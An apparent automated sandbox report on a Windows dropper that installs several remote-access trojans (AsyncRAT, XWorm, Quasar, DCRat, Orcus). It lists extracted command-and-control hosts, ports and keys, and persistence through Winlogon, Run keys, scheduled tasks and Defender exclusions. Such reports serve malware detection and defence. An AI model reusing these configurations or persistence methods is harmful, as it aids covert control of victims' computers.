Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system -
submitted
11-08-2024 06:59
General
-
Target
713e742f7314ca8d684137f996540b4b.exe
-
Size
6.7MB
-
MD5
713e742f7314ca8d684137f996540b4b
-
SHA1
1d88ed5170efab2d32d83341be56e1b9f6720d7c
-
SHA256
41bd2718e24b2367c4a29a6eb94045d4ce1e29b4d6ca99d7d2d8b14e316e18f5
-
SHA512
df373f00d609666811494d31c48f030e15155ddd4c3ccd4f0ef734a0eb4bee074244e8bb73263f06edca3cef60db37f7f603e98b7c040b6741dbcf8270fa90e4
-
SSDEEP
98304:tbqknnTC8vHM8aKN+3v4FOjfU2TNe7vWL26AaNeWgPhlmVqkQ7XSKUR83B:tzO8vH04FmMnG4S03B
Malware Config
Extracted
asyncrat
0.5.8
Default
thing-wine.gl.at.ply.gg:55280
EFhpy3TPM7sR
-
delay
3
-
install
true
-
install_file
Ass.exe
-
install_folder
%Temp%
Extracted
xworm
projects-pf.gl.at.ply.gg:55284
wiz.bounceme.net:6000
-
Install_directory
%ProgramData%
-
install_file
USB.exe
Extracted
quasar
1.4.1
Office04
businesses-eric.gl.at.ply.gg:55282
ebfbd873-38ee-4f7b-bfe9-2b77cdff1c45
-
encryption_key
361A99FCBAEDCD5C706B5E52C37C90BFB4E13FB2
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
DcRat
DarkCrystal (DC) is a new .NET RAT, active since June 2019, that is capable of loading additional plugins.
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023412-52.dat family_xworm behavioral2/memory/4560-57-0x0000000000E00000-0x0000000000E1A000-memory.dmp family_xworm behavioral2/memory/4560-260-0x000000001C310000-0x000000001C31E000-memory.dmp family_xworm -
Modifies WinLogon for persistence 2 TTPs 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\", \"C:\\Windows\\Panther\\actionqueue\\Client.exe\", \"C:\\Windows\\appcompat\\SearchApp.exe\", \"C:\\Program Files\\Windows Defender\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\timeout.exe\", \"C:\\ChainPortsessionbroker\\sppsvc.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\", \"C:\\Windows\\Panther\\actionqueue\\Client.exe\", \"C:\\Windows\\appcompat\\SearchApp.exe\", \"C:\\Program Files\\Windows Defender\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\timeout.exe\", \"C:\\ChainPortsessionbroker\\sppsvc.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\ChainPortsessionbroker\\dllhost.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", 
\"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\", \"C:\\Windows\\Panther\\actionqueue\\Client.exe\", \"C:\\Windows\\appcompat\\SearchApp.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\", \"C:\\Windows\\Panther\\actionqueue\\Client.exe\", \"C:\\Windows\\appcompat\\SearchApp.exe\", \"C:\\Program Files\\Windows Defender\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\", \"C:\\Windows\\Panther\\actionqueue\\Client.exe\", \"C:\\Windows\\appcompat\\SearchApp.exe\", \"C:\\Program Files\\Windows Defender\\RuntimeBroker.exe\", 
\"C:\\Recovery\\WindowsRE\\timeout.exe\", \"C:\\ChainPortsessionbroker\\sppsvc.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\", \"C:\\Windows\\Panther\\actionqueue\\Client.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program 
Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\", \"C:\\Windows\\Panther\\actionqueue\\Client.exe\", \"C:\\Windows\\appcompat\\SearchApp.exe\", \"C:\\Program Files\\Windows Defender\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\timeout.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\", \"C:\\Program Files\\Crashpad\\attachments\\System.exe\", \"C:\\ChainPortsessionbroker\\smss.exe\", \"C:\\Users\\Public\\explorer.exe\", \"C:\\Windows\\fr-FR\\upfc.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\", \"C:\\Program Files\\Common Files\\Services\\sihost.exe\"" Fontsession.exe -
Process spawned unexpected child process 42 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2284 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4604 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 996 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2712 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 932 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2244 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1624 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4624 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4844 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4880 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2396 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4296 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2176 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 512 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2536 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4836 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1436 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4416 632 
schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4820 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4516 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3816 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1412 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3532 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4260 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3672 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4584 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4944 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2116 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1936 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3212 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4048 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4148 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2596 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 264 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1260 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2916 632 schtasks.exe 106 Parent 
C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4204 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2416 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4072 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3592 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4648 632 schtasks.exe 106 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2928 632 schtasks.exe 106 -
Quasar payload 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023411-34.dat family_quasar behavioral2/memory/3568-56-0x0000000000400000-0x0000000000AB3000-memory.dmp family_quasar behavioral2/memory/1408-59-0x00000000001D0000-0x00000000004F4000-memory.dmp family_quasar -
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x000800000002340b-4.dat family_asyncrat -
resource yara_rule behavioral2/files/0x000700000002340f-15.dat dcrat behavioral2/memory/3568-56-0x0000000000400000-0x0000000000AB3000-memory.dmp dcrat behavioral2/files/0x0007000000023415-128.dat dcrat behavioral2/memory/4832-135-0x0000000000190000-0x00000000003E2000-memory.dmp dcrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
pid Process 4704 powershell.exe 3096 powershell.exe 1420 powershell.exe -
Disables Task Manager via registry modification
-
Checks computer location settings 2 TTPs 8 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation OrcusStub.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation WizWormStub.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation AsyncStub.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation Fontsession.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation Fontsession.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation 713e742f7314ca8d684137f996540b4b.exe Key value queried \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation DCRatStub.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WizWormStub.lnk WizWormStub.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WizWormStub.lnk WizWormStub.exe -
Executes dropped EXE 14 IoCs
pid Process 3212 AsyncStub.exe 4048 DCRatStub.exe 1736 OrcusStub.exe 1408 QuasarStub.exe 4560 WizWormStub.exe 8 WindowsInput.exe 4832 Fontsession.exe 1516 Client.exe 1740 AudioDriver.exe 2428 Fontsession.exe 964 Ass.exe 4836 dllhost.exe 4908 WizWormStub.exe 1844 WizWormStub.exe -
Adds Run key to start application 2 TTPs 29 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\ChainPortsessionbroker\\dllhost.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WizWormStub = "C:\\ProgramData\\WizWormStub.exe" WizWormStub.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Windows\\fr-FR\\upfc.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Windows\\fr-FR\\upfc.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\ChainPortsessionbroker\\sppsvc.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Users\\Public\\explorer.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client = "\"C:\\Windows\\Panther\\actionqueue\\Client.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Windows\\appcompat\\SearchApp.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client = "\"C:\\Windows\\Panther\\actionqueue\\Client.exe\"" Fontsession.exe Set value (str) 
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\timeout = "\"C:\\Recovery\\WindowsRE\\timeout.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files\\Windows Defender\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Windows\\appcompat\\SearchApp.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\timeout = "\"C:\\Recovery\\WindowsRE\\timeout.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\ChainPortsessionbroker\\smss.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Users\\Public\\explorer.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\ChainPortsessionbroker\\dllhost.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Program Files (x86)\\Microsoft.NET\\RedistList\\SearchApp.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\uk-UA\\Registry.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = 
"\"C:\\Program Files\\Windows Defender\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\ChainPortsessionbroker\\smss.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Program Files\\Common Files\\Services\\sihost.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\ChainPortsessionbroker\\sppsvc.exe\"" Fontsession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Crashpad\\attachments\\System.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Program Files\\Crashpad\\attachments\\System.exe\"" Fontsession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sihost = "\"C:\\Program Files\\Common Files\\Services\\sihost.exe\"" Fontsession.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File created C:\Windows\system32\SubDir\Client.exe QuasarStub.exe File opened for modification C:\Windows\system32\SubDir\Client.exe QuasarStub.exe File opened for modification C:\Windows\system32\SubDir QuasarStub.exe File opened for modification C:\Windows\system32\SubDir\Client.exe Client.exe File opened for modification C:\Windows\system32\SubDir Client.exe File created C:\Windows\SysWOW64\WindowsInput.exe OrcusStub.exe File opened for modification C:\Windows\SysWOW64\WindowsInput.InstallLog WindowsInput.exe File created C:\Windows\SysWOW64\WindowsInput.InstallState WindowsInput.exe -
Drops file in Program Files directory 12 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft.NET\RedistList\38384e6a620884 Fontsession.exe File created C:\Program Files\Crashpad\attachments\27d1bcfc3c54e0 Fontsession.exe File created C:\Program Files\Common Files\Services\sihost.exe Fontsession.exe File created C:\Program Files\Common Files\Services\66fc9ff0ee96c2 Fontsession.exe File created C:\Program Files\Windows Defender\RuntimeBroker.exe Fontsession.exe File created C:\Program Files\Windows Defender\9e8d7a4ca61bd9 Fontsession.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\SearchApp.exe Fontsession.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\SearchApp.exe Fontsession.exe File created C:\Program Files\Crashpad\attachments\System.exe Fontsession.exe File created C:\Program Files\ModifiableWindowsApps\services.exe Fontsession.exe File created C:\Program Files (x86)\Windows Photo Viewer\uk-UA\Registry.exe Fontsession.exe File created C:\Program Files (x86)\Windows Photo Viewer\uk-UA\ee2ad38f3d4382 Fontsession.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\fr-FR\ea1d8f6d871115 Fontsession.exe File created C:\Windows\Panther\actionqueue\Client.exe Fontsession.exe File created C:\Windows\Panther\actionqueue\5e896533852c8e Fontsession.exe File created C:\Windows\appcompat\SearchApp.exe Fontsession.exe File created C:\Windows\appcompat\38384e6a620884 Fontsession.exe File created C:\Windows\fr-FR\upfc.exe Fontsession.exe File opened for modification C:\Windows\fr-FR\upfc.exe Fontsession.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempts to gather information about the system language of a victim host in order to infer its geographical location.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 713e742f7314ca8d684137f996540b4b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OrcusStub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AudioDriver.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ass.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AsyncStub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DCRatStub.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4924 timeout.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings DCRatStub.exe Key created \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings Fontsession.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3904 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 46 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4516 schtasks.exe 3592 schtasks.exe 2176 schtasks.exe 4260 schtasks.exe 1936 schtasks.exe 4880 schtasks.exe 4296 schtasks.exe 1412 schtasks.exe 1260 schtasks.exe 2416 schtasks.exe 4032 schtasks.exe 3816 schtasks.exe 2244 schtasks.exe 1624 schtasks.exe 4836 schtasks.exe 4416 schtasks.exe 4820 schtasks.exe 264 schtasks.exe 2284 schtasks.exe 932 schtasks.exe 2916 schtasks.exe 4204 schtasks.exe 3212 schtasks.exe 4148 schtasks.exe 2928 schtasks.exe 1216 schtasks.exe 4584 schtasks.exe 2116 schtasks.exe 4944 schtasks.exe 4048 schtasks.exe 4072 schtasks.exe 4648 schtasks.exe 4624 schtasks.exe 1436 schtasks.exe 3532 schtasks.exe 2596 schtasks.exe 4604 schtasks.exe 2712 schtasks.exe 4204 schtasks.exe 4844 schtasks.exe 2396 schtasks.exe 512 schtasks.exe 2536 schtasks.exe 3672 schtasks.exe 3404 schtasks.exe 996 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
